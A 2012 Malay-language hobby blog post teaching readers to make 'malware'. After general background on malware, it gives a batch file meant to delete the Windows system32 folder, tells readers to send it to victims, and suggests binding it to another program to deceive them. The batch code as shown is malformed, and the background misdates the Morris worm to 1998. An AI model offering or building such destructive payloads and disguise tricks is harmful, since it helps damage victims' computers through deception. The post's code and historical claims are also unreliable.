Saturday, 28 January 2012

Tutorial Membuat Virus Malware!



Assalamualaikum...baiklah entry kali ini aku nak ajar korang cara buat virus malware.senang jer.disebabkan banyak pm aku macam mana nak buat malware -,- .


Sebelum tu korang kena tahu apa fungsi malware :

Malware merupakan perisian yang direka bentuk untuk memasuki ke dalam sistem komputer dan menyebabkan resiko kerosakan komputer tanpa disedari oleh pengguna.

Nama Malware wujud daripada gabungan ‘malicius’ yang membawa maksud niat jahat dan ‘software’ pula bermaksud perisian. Perisian ini dicipta oleh individu yang mempunyai kepakaran berkenaan kod program pelbagai perisian. Tujuan golongan ini ialah untuk mengganggu, mengancam dan menimbulkan masalah kepada pengguna komputer. Mereka mencipta Malware seperti cecacing internet dan beberapa virus lain bagi tujuan untuk menguji kemahiran komputer yang dimiliki serta ingin melihat sejauh mana kejayaan mereka menyebarkan virus yang dicipta.

Salah satu Malware yang mula-mula disebarkan adalah cecacing yang telah direka oleh seorang pelajar Cornell University, Robert Morris pada tahun 1998. Tujuan asalnya ialah untuk latihan bagi menguji dan mengukur saiz Internet. Namun telah berlaku kesilapan dalam pengekodan menyebabkan cecacing tersebut telah berupaya menyalin semula dan tersebar meluas ke beribu-ribu komputer di seluruh dunia.

Pada masa ini Malware diwujudkan untuk tujuan mengaut keuntungan. Bukan saja untuk mengganggu sistem komputer tetapi ia juga digunakan untuk mencuri data, identiti, wang serta maklumat pengguna, semata-mata bagi mengaut keuntungan yang berlipat ganda oleh penjenayah siber.

Pengguna selalunya tidak sedar, bahawa sebahagian perisian yang dimuat turun dari internet yang digunakan sebenarnya adalah merbahaya kerana penyamaran yang dilakukan. Teknik inilah yang telah digunakan oleh kebanyakan virus trojen. Teknik yang dikenali sebagai ‘rootkits’ menawarkan penyembunyian Malware daripada pengetahuan pengguna dan menghalang daripada dikesan oleh program anti virus.

Kemunculan lebih banyak rangkaian sosial seperti YouTube, MySpace dan sebagainya akan menggalakkan lagi penyebaran Malware. Penyebaran ini juga boleh berlaku melalui pautan pada ruangan forum, sembang talian, pautan video dan ruangan berita.

Malware akan menyebabkan sistem komputer bertambah lambat seperti penyambungan Internet dan juga masa untuk sistem ‘boot’ menjalankan operasinya.






Baiklah dah tahu kan?seperti yg dimaklumkan malware ni boleh rosakkan computer dan curi data.tapi yang aku nak ajar ni yang rosakkan jer.curi data advance lagi.haha.video pun aku sertakan.


JOM MULA!


Video (Credit To Macho Ayie) :



Langkah-langkah :
1. Buka notepad.

2. Masukkan code2 dibawah :


@echo off
del
c:\windows\system32

3. Selepas itu save :

File Name : malware.bat
Save As Type : All Files (*.*)


4. Itu saja!SIAP!
Upload dan hantar kepada mangsa!

PERHATIAN!
JANGAN MENCUBA VIRUS INI DI COMPUTER ANDA SENDIRI!SENDIRI BUAT SENDIRI TANGGUNG!


Tips :

Untuk menyakinkan mangsa korang, korang boleh lah bind file malware korang dengan program lain!Gunakan binder.Rujuk video dibawah :

 

Itu saja untuk harini.jangan lupa lawat official site aku.
Link : Rea_pErz's Official Site

Assalamualaikum......
Item Reviewed: Tutorial Membuat Virus Malware! Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com